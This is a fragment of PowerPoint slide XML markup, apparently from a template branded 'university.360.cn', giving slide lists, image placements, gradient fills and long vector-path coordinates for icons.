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8" r:id="rId4"/>
    <p:sldId id="265" r:id="rId5"/>
    <p:sldId id="269" r:id="rId6"/>
    <p:sldId id="283" r:id="rId7"/>
    <p:sldId id="287" r:id="rId8"/>
    <p:sldId id="288" r:id="rId9"/>
    <p:sldId id="289" r:id="rId10"/>
    <p:sldId id="278" r:id="rId11"/>
    <p:sldId id="279" r:id="rId12"/>
    <p:sldId id="280" r:id="rId13"/>
    <p:sldId id="281" r:id="rId14"/>
    <p:sldId id="282" r:id="rId15"/>
    <p:sldId id="272" r:id="rId17"/>
    <p:sldId id="273" r:id="rId18"/>
    <p:sldId id="274" r:id="rId19"/>
    <p:sldId id="275" r:id="rId20"/>
    <p:sldId id="277" r:id="rId21"/>
    <p:sldId id="290" r:id="rId22"/>
    <p:sldId id="276" r:id="rId23"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:custDataLst>
    <p:tags r:id="rId2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2260" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="38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C593"/>
    <a:srgbClr val="72C594"/>
    <a:srgbClr val="70AD47"/>
    <a:srgbClr val="95D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 snapToObjects="1" showGuides="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="65" d="100"/>
          <a:sy n="65" d="100"/>
        </p:scale>
        <p:origin x="72" y="204"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2260"/>
        <p:guide pos="386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62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55" name="Shape 5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1" descr="图片 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect l="50028" b="13495"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-812800" y="2149475"/>
            <a:ext cx="4159885" cy="33902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7" name="图片 10" descr="图片 10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect b="3900"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="961389" y="3518093"/>
            <a:ext cx="10433686" cy="36607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8" name="图片 9" descr="图片 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect t="6678" b="1167"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4766945" y="-391160"/>
            <a:ext cx="7797801" cy="33559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" name="标题 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1196340" y="6416675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 smtClean="0"/>
              <a:t>university.360.cn</a:t>
            </a:r>
            <a:endParaRPr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" y="550734"/>
            <a:ext cx="1585452" cy="63418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8" descr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 smtClean="0"/>
              <a:t>university.360.cn</a:t>
            </a:r>
            <a:endParaRPr sz="1600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97117"/>
            <a:ext cx="12192000" cy="502848"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="89000">
                <a:srgbClr val="00AB7A">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="45000">
                <a:srgbClr val="00AB7A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61739" y="6320292"/>
            <a:ext cx="1028887" cy="271009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47817226-A4A8-4CA8-8499-073E4B5E21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069579" y="6502853"/>
            <a:ext cx="789305" cy="278947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CE3A6F2A-4BD1-4B71-A85C-4AC4B8E4C9A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AutoShape 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="564" y="236492"/>
            <a:ext cx="251119" cy="309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Freeform 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="69031" y="219203"/>
            <a:ext cx="145443" cy="145443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Freeform 34"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="226448" y="341831"/>
            <a:ext cx="77055" cy="77055"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 58 w 65"/>
              <a:gd name="T1" fmla="*/ 25 h 65"/>
              <a:gd name="T2" fmla="*/ 40 w 65"/>
              <a:gd name="T3" fmla="*/ 25 h 65"/>
              <a:gd name="T4" fmla="*/ 40 w 65"/>
              <a:gd name="T5" fmla="*/ 7 h 65"/>
              <a:gd name="T6" fmla="*/ 33 w 65"/>
              <a:gd name="T7" fmla="*/ 0 h 65"/>
              <a:gd name="T8" fmla="*/ 25 w 65"/>
              <a:gd name="T9" fmla="*/ 7 h 65"/>
              <a:gd name="T10" fmla="*/ 25 w 65"/>
              <a:gd name="T11" fmla="*/ 11 h 65"/>
              <a:gd name="T12" fmla="*/ 25 w 65"/>
              <a:gd name="T13" fmla="*/ 25 h 65"/>
              <a:gd name="T14" fmla="*/ 7 w 65"/>
              <a:gd name="T15" fmla="*/ 25 h 65"/>
              <a:gd name="T16" fmla="*/ 0 w 65"/>
              <a:gd name="T17" fmla="*/ 32 h 65"/>
              <a:gd name="T18" fmla="*/ 7 w 65"/>
              <a:gd name="T19" fmla="*/ 40 h 65"/>
              <a:gd name="T20" fmla="*/ 25 w 65"/>
              <a:gd name="T21" fmla="*/ 40 h 65"/>
              <a:gd name="T22" fmla="*/ 25 w 65"/>
              <a:gd name="T23" fmla="*/ 57 h 65"/>
              <a:gd name="T24" fmla="*/ 33 w 65"/>
              <a:gd name="T25" fmla="*/ 65 h 65"/>
              <a:gd name="T26" fmla="*/ 40 w 65"/>
              <a:gd name="T27" fmla="*/ 57 h 65"/>
              <a:gd name="T28" fmla="*/ 40 w 65"/>
              <a:gd name="T29" fmla="*/ 40 h 65"/>
              <a:gd name="T30" fmla="*/ 45 w 65"/>
              <a:gd name="T31" fmla="*/ 40 h 65"/>
              <a:gd name="T32" fmla="*/ 58 w 65"/>
              <a:gd name="T33" fmla="*/ 40 h 65"/>
              <a:gd name="T34" fmla="*/ 65 w 65"/>
              <a:gd name="T35" fmla="*/ 32 h 65"/>
              <a:gd name="T36" fmla="*/ 58 w 65"/>
              <a:gd name="T37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" h="65">
                <a:moveTo>
                  <a:pt x="58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3"/>
                  <a:pt x="37" y="0"/>
                  <a:pt x="33" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="28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25" y="25"/>
                  <a:pt x="25" y="25"/>
                  <a:pt x="25" y="25"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7" y="25"/>
                  <a:pt x="7" y="25"/>
                  <a:pt x="7" y="25"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3" y="25"/>
                  <a:pt x="0" y="28"/>
                  <a:pt x="0" y="32"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="36"/>
                  <a:pt x="3" y="40"/>
                  <a:pt x="7" y="40"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="25" y="40"/>
                  <a:pt x="25" y="40"/>
                  <a:pt x="25" y="40"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="25" y="57"/>
                  <a:pt x="25" y="57"/>
                  <a:pt x="25" y="57"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="25" y="61"/>
                  <a:pt x="28" y="65"/>
                  <a:pt x="33" y="65"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="37" y="65"/>
                  <a:pt x="40" y="61"/>
                  <a:pt x="40" y="57"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="40" y="40"/>
                  <a:pt x="40" y="40"/>
                  <a:pt x="40" y="40"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="45" y="40"/>
                  <a:pt x="45" y="40"/>
                  <a:pt x="45" y="40"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="58" y="40"/>
                  <a:pt x="58" y="40"/>
                  <a:pt x="58" y="40"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="62" y="40"/>
                  <a:pt x="65" y="36"/>
                  <a:pt x="65" y="32"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="65" y="28"/>
                  <a:pt x="62" y="25"/>
                  <a:pt x="58" y="25"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="5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0482901" y="170733"/>
            <a:ext cx="1375983" cy="344775"/>
            <a:chOff x="7550392" y="-466606"/>
            <a:chExt cx="1031987" cy="258581"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="555963"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Freeform 5"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7591672" y="-422211"/>
              <a:ext cx="66982" cy="65424"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 35 w 40"/>
                <a:gd name="T1" fmla="*/ 15 h 39"/>
                <a:gd name="T2" fmla="*/ 25 w 40"/>
                <a:gd name="T3" fmla="*/ 15 h 39"/>
                <a:gd name="T4" fmla="*/ 25 w 40"/>
                <a:gd name="T5" fmla="*/ 4 h 39"/>
                <a:gd name="T6" fmla="*/ 20 w 40"/>
                <a:gd name="T7" fmla="*/ 0 h 39"/>
                <a:gd name="T8" fmla="*/ 16 w 40"/>
                <a:gd name="T9" fmla="*/ 4 h 39"/>
                <a:gd name="T10" fmla="*/ 16 w 40"/>
                <a:gd name="T11" fmla="*/ 15 h 39"/>
                <a:gd name="T12" fmla="*/ 5 w 40"/>
                <a:gd name="T13" fmla="*/ 15 h 39"/>
                <a:gd name="T14" fmla="*/ 0 w 40"/>
                <a:gd name="T15" fmla="*/ 20 h 39"/>
                <a:gd name="T16" fmla="*/ 0 w 40"/>
                <a:gd name="T17" fmla="*/ 20 h 39"/>
                <a:gd name="T18" fmla="*/ 5 w 40"/>
                <a:gd name="T19" fmla="*/ 24 h 39"/>
                <a:gd name="T20" fmla="*/ 16 w 40"/>
                <a:gd name="T21" fmla="*/ 24 h 39"/>
                <a:gd name="T22" fmla="*/ 16 w 40"/>
                <a:gd name="T23" fmla="*/ 35 h 39"/>
                <a:gd name="T24" fmla="*/ 20 w 40"/>
                <a:gd name="T25" fmla="*/ 39 h 39"/>
                <a:gd name="T26" fmla="*/ 25 w 40"/>
                <a:gd name="T27" fmla="*/ 35 h 39"/>
                <a:gd name="T28" fmla="*/ 25 w 40"/>
                <a:gd name="T29" fmla="*/ 24 h 39"/>
                <a:gd name="T30" fmla="*/ 35 w 40"/>
                <a:gd name="T31" fmla="*/ 24 h 39"/>
                <a:gd name="T32" fmla="*/ 40 w 40"/>
                <a:gd name="T33" fmla="*/ 20 h 39"/>
                <a:gd name="T34" fmla="*/ 40 w 40"/>
                <a:gd name="T35" fmla="*/ 20 h 39"/>
                <a:gd name="T36" fmla="*/ 35 w 40"/>
                <a:gd name="T37" fmla="*/ 1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" h="39">
                  <a:moveTo>
                    <a:pt x="35" y="15"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="15"/>
                    <a:pt x="25" y="15"/>
                    <a:pt x="25" y="1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2"/>
                    <a:pt x="23" y="0"/>
                    <a:pt x="20" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="0"/>
                    <a:pt x="16" y="2"/>
                    <a:pt x="16" y="4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2" y="15"/>
                    <a:pt x="0" y="17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5" y="24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6" y="35"/>
                    <a:pt x="16" y="35"/>
                    <a:pt x="16" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="37"/>
                    <a:pt x="18" y="39"/>
                    <a:pt x="20" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="39"/>
                    <a:pt x="25" y="37"/>
                    <a:pt x="25" y="3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8" y="24"/>
                    <a:pt x="40" y="22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17"/>
                    <a:pt x="38" y="15"/>
                    <a:pt x="35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0" name="Freeform 6"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7550392" y="-466606"/>
              <a:ext cx="151098" cy="154214"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 84 w 91"/>
                <a:gd name="T1" fmla="*/ 22 h 91"/>
                <a:gd name="T2" fmla="*/ 83 w 91"/>
                <a:gd name="T3" fmla="*/ 20 h 91"/>
                <a:gd name="T4" fmla="*/ 60 w 91"/>
                <a:gd name="T5" fmla="*/ 3 h 91"/>
                <a:gd name="T6" fmla="*/ 59 w 91"/>
                <a:gd name="T7" fmla="*/ 2 h 91"/>
                <a:gd name="T8" fmla="*/ 58 w 91"/>
                <a:gd name="T9" fmla="*/ 2 h 91"/>
                <a:gd name="T10" fmla="*/ 56 w 91"/>
                <a:gd name="T11" fmla="*/ 1 h 91"/>
                <a:gd name="T12" fmla="*/ 55 w 91"/>
                <a:gd name="T13" fmla="*/ 1 h 91"/>
                <a:gd name="T14" fmla="*/ 51 w 91"/>
                <a:gd name="T15" fmla="*/ 1 h 91"/>
                <a:gd name="T16" fmla="*/ 50 w 91"/>
                <a:gd name="T17" fmla="*/ 0 h 91"/>
                <a:gd name="T18" fmla="*/ 48 w 91"/>
                <a:gd name="T19" fmla="*/ 0 h 91"/>
                <a:gd name="T20" fmla="*/ 47 w 91"/>
                <a:gd name="T21" fmla="*/ 0 h 91"/>
                <a:gd name="T22" fmla="*/ 45 w 91"/>
                <a:gd name="T23" fmla="*/ 0 h 91"/>
                <a:gd name="T24" fmla="*/ 8 w 91"/>
                <a:gd name="T25" fmla="*/ 20 h 91"/>
                <a:gd name="T26" fmla="*/ 7 w 91"/>
                <a:gd name="T27" fmla="*/ 21 h 91"/>
                <a:gd name="T28" fmla="*/ 6 w 91"/>
                <a:gd name="T29" fmla="*/ 23 h 91"/>
                <a:gd name="T30" fmla="*/ 5 w 91"/>
                <a:gd name="T31" fmla="*/ 24 h 91"/>
                <a:gd name="T32" fmla="*/ 5 w 91"/>
                <a:gd name="T33" fmla="*/ 25 h 91"/>
                <a:gd name="T34" fmla="*/ 4 w 91"/>
                <a:gd name="T35" fmla="*/ 26 h 91"/>
                <a:gd name="T36" fmla="*/ 0 w 91"/>
                <a:gd name="T37" fmla="*/ 46 h 91"/>
                <a:gd name="T38" fmla="*/ 5 w 91"/>
                <a:gd name="T39" fmla="*/ 66 h 91"/>
                <a:gd name="T40" fmla="*/ 31 w 91"/>
                <a:gd name="T41" fmla="*/ 88 h 91"/>
                <a:gd name="T42" fmla="*/ 32 w 91"/>
                <a:gd name="T43" fmla="*/ 89 h 91"/>
                <a:gd name="T44" fmla="*/ 34 w 91"/>
                <a:gd name="T45" fmla="*/ 89 h 91"/>
                <a:gd name="T46" fmla="*/ 36 w 91"/>
                <a:gd name="T47" fmla="*/ 90 h 91"/>
                <a:gd name="T48" fmla="*/ 45 w 91"/>
                <a:gd name="T49" fmla="*/ 91 h 91"/>
                <a:gd name="T50" fmla="*/ 48 w 91"/>
                <a:gd name="T51" fmla="*/ 91 h 91"/>
                <a:gd name="T52" fmla="*/ 53 w 91"/>
                <a:gd name="T53" fmla="*/ 90 h 91"/>
                <a:gd name="T54" fmla="*/ 54 w 91"/>
                <a:gd name="T55" fmla="*/ 90 h 91"/>
                <a:gd name="T56" fmla="*/ 58 w 91"/>
                <a:gd name="T57" fmla="*/ 89 h 91"/>
                <a:gd name="T58" fmla="*/ 59 w 91"/>
                <a:gd name="T59" fmla="*/ 89 h 91"/>
                <a:gd name="T60" fmla="*/ 61 w 91"/>
                <a:gd name="T61" fmla="*/ 88 h 91"/>
                <a:gd name="T62" fmla="*/ 62 w 91"/>
                <a:gd name="T63" fmla="*/ 88 h 91"/>
                <a:gd name="T64" fmla="*/ 64 w 91"/>
                <a:gd name="T65" fmla="*/ 87 h 91"/>
                <a:gd name="T66" fmla="*/ 65 w 91"/>
                <a:gd name="T67" fmla="*/ 86 h 91"/>
                <a:gd name="T68" fmla="*/ 67 w 91"/>
                <a:gd name="T69" fmla="*/ 85 h 91"/>
                <a:gd name="T70" fmla="*/ 68 w 91"/>
                <a:gd name="T71" fmla="*/ 85 h 91"/>
                <a:gd name="T72" fmla="*/ 91 w 91"/>
                <a:gd name="T73" fmla="*/ 46 h 91"/>
                <a:gd name="T74" fmla="*/ 72 w 91"/>
                <a:gd name="T75" fmla="*/ 77 h 91"/>
                <a:gd name="T76" fmla="*/ 24 w 91"/>
                <a:gd name="T77" fmla="*/ 64 h 91"/>
                <a:gd name="T78" fmla="*/ 8 w 91"/>
                <a:gd name="T79" fmla="*/ 62 h 91"/>
                <a:gd name="T80" fmla="*/ 8 w 91"/>
                <a:gd name="T81" fmla="*/ 62 h 91"/>
                <a:gd name="T82" fmla="*/ 18 w 91"/>
                <a:gd name="T83" fmla="*/ 14 h 91"/>
                <a:gd name="T84" fmla="*/ 67 w 91"/>
                <a:gd name="T85" fmla="*/ 27 h 91"/>
                <a:gd name="T86" fmla="*/ 83 w 91"/>
                <a:gd name="T87" fmla="*/ 29 h 91"/>
                <a:gd name="T88" fmla="*/ 83 w 91"/>
                <a:gd name="T89" fmla="*/ 29 h 91"/>
                <a:gd name="T90" fmla="*/ 72 w 91"/>
                <a:gd name="T91" fmla="*/ 77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1" h="91">
                  <a:moveTo>
                    <a:pt x="84" y="22"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="22"/>
                    <a:pt x="84" y="22"/>
                    <a:pt x="84" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="22"/>
                    <a:pt x="84" y="21"/>
                    <a:pt x="83" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="21"/>
                    <a:pt x="83" y="20"/>
                    <a:pt x="83" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="20"/>
                    <a:pt x="83" y="20"/>
                    <a:pt x="83" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="12"/>
                    <a:pt x="69" y="6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9" y="2"/>
                    <a:pt x="59" y="2"/>
                    <a:pt x="59" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="2"/>
                    <a:pt x="59" y="2"/>
                    <a:pt x="58" y="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7" y="2"/>
                    <a:pt x="57" y="2"/>
                    <a:pt x="56" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="2"/>
                    <a:pt x="56" y="2"/>
                    <a:pt x="56" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="1"/>
                    <a:pt x="55" y="1"/>
                    <a:pt x="55" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="1"/>
                    <a:pt x="55" y="1"/>
                    <a:pt x="55" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="1"/>
                    <a:pt x="53" y="1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0"/>
                    <a:pt x="47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45" y="0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28" y="1"/>
                    <a:pt x="15" y="9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7" y="20"/>
                    <a:pt x="7" y="21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7" y="22"/>
                    <a:pt x="6" y="22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6" y="23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5"/>
                    <a:pt x="5" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="25"/>
                    <a:pt x="5" y="25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1" y="32"/>
                    <a:pt x="0" y="39"/>
                    <a:pt x="0" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="53"/>
                    <a:pt x="2" y="60"/>
                    <a:pt x="5" y="66"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="66"/>
                    <a:pt x="5" y="66"/>
                    <a:pt x="5" y="66"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="77"/>
                    <a:pt x="19" y="85"/>
                    <a:pt x="31" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="88"/>
                    <a:pt x="31" y="88"/>
                    <a:pt x="31" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="89"/>
                    <a:pt x="31" y="89"/>
                    <a:pt x="31" y="89"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="89"/>
                    <a:pt x="32" y="89"/>
                    <a:pt x="32" y="89"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="89"/>
                    <a:pt x="32" y="89"/>
                    <a:pt x="33" y="89"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="89"/>
                    <a:pt x="34" y="89"/>
                    <a:pt x="34" y="89"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="89"/>
                    <a:pt x="34" y="90"/>
                    <a:pt x="34" y="90"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="90"/>
                    <a:pt x="35" y="90"/>
                    <a:pt x="36" y="90"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="90"/>
                    <a:pt x="36" y="90"/>
                    <a:pt x="36" y="90"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="91"/>
                    <a:pt x="42" y="91"/>
                    <a:pt x="45" y="91"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="91"/>
                    <a:pt x="46" y="91"/>
                    <a:pt x="47" y="91"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="91"/>
                    <a:pt x="47" y="91"/>
                    <a:pt x="48" y="91"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="91"/>
                    <a:pt x="51" y="90"/>
                    <a:pt x="53" y="90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4" y="90"/>
                    <a:pt x="54" y="90"/>
                    <a:pt x="54" y="90"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="90"/>
                    <a:pt x="56" y="89"/>
                    <a:pt x="57" y="89"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="89"/>
                    <a:pt x="58" y="89"/>
                    <a:pt x="58" y="89"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="89"/>
                    <a:pt x="58" y="89"/>
                    <a:pt x="59" y="89"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="89"/>
                    <a:pt x="59" y="89"/>
                    <a:pt x="59" y="89"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="89"/>
                    <a:pt x="60" y="88"/>
                    <a:pt x="60" y="88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61" y="88"/>
                    <a:pt x="61" y="88"/>
                    <a:pt x="62" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="88"/>
                    <a:pt x="62" y="88"/>
                    <a:pt x="62" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="87"/>
                    <a:pt x="63" y="87"/>
                    <a:pt x="63" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="87"/>
                    <a:pt x="64" y="87"/>
                    <a:pt x="64" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="87"/>
                    <a:pt x="64" y="87"/>
                    <a:pt x="64" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="87"/>
                    <a:pt x="65" y="86"/>
                    <a:pt x="65" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="86"/>
                    <a:pt x="65" y="86"/>
                    <a:pt x="66" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="86"/>
                    <a:pt x="66" y="86"/>
                    <a:pt x="67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7" y="85"/>
                    <a:pt x="68" y="85"/>
                    <a:pt x="68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82" y="77"/>
                    <a:pt x="91" y="62"/>
                    <a:pt x="91" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="37"/>
                    <a:pt x="88" y="29"/>
                    <a:pt x="84" y="22"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="72" y="77"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="78"/>
                    <a:pt x="65" y="80"/>
                    <a:pt x="61" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="82"/>
                    <a:pt x="35" y="76"/>
                    <a:pt x="24" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="63"/>
                    <a:pt x="19" y="61"/>
                    <a:pt x="18" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="59"/>
                    <a:pt x="9" y="61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8" y="62"/>
                    <a:pt x="8" y="62"/>
                    <a:pt x="8" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="57"/>
                    <a:pt x="4" y="52"/>
                    <a:pt x="4" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="33"/>
                    <a:pt x="10" y="22"/>
                    <a:pt x="18" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="13"/>
                    <a:pt x="25" y="11"/>
                    <a:pt x="29" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="9"/>
                    <a:pt x="55" y="15"/>
                    <a:pt x="67" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="28"/>
                    <a:pt x="71" y="30"/>
                    <a:pt x="72" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="32"/>
                    <a:pt x="81" y="30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3" y="29"/>
                    <a:pt x="83" y="29"/>
                    <a:pt x="83" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="34"/>
                    <a:pt x="86" y="40"/>
                    <a:pt x="86" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="58"/>
                    <a:pt x="81" y="69"/>
                    <a:pt x="72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1" name="Freeform 7"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7717068" y="-437788"/>
              <a:ext cx="111377" cy="96578"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 67 w 67"/>
                <a:gd name="T1" fmla="*/ 20 h 57"/>
                <a:gd name="T2" fmla="*/ 47 w 67"/>
                <a:gd name="T3" fmla="*/ 0 h 57"/>
                <a:gd name="T4" fmla="*/ 0 w 67"/>
                <a:gd name="T5" fmla="*/ 0 h 57"/>
                <a:gd name="T6" fmla="*/ 0 w 67"/>
                <a:gd name="T7" fmla="*/ 3 h 57"/>
                <a:gd name="T8" fmla="*/ 5 w 67"/>
                <a:gd name="T9" fmla="*/ 8 h 57"/>
                <a:gd name="T10" fmla="*/ 47 w 67"/>
                <a:gd name="T11" fmla="*/ 8 h 57"/>
                <a:gd name="T12" fmla="*/ 58 w 67"/>
                <a:gd name="T13" fmla="*/ 20 h 57"/>
                <a:gd name="T14" fmla="*/ 58 w 67"/>
                <a:gd name="T15" fmla="*/ 22 h 57"/>
                <a:gd name="T16" fmla="*/ 58 w 67"/>
                <a:gd name="T17" fmla="*/ 23 h 57"/>
                <a:gd name="T18" fmla="*/ 57 w 67"/>
                <a:gd name="T19" fmla="*/ 23 h 57"/>
                <a:gd name="T20" fmla="*/ 6 w 67"/>
                <a:gd name="T21" fmla="*/ 23 h 57"/>
                <a:gd name="T22" fmla="*/ 6 w 67"/>
                <a:gd name="T23" fmla="*/ 32 h 57"/>
                <a:gd name="T24" fmla="*/ 57 w 67"/>
                <a:gd name="T25" fmla="*/ 32 h 57"/>
                <a:gd name="T26" fmla="*/ 58 w 67"/>
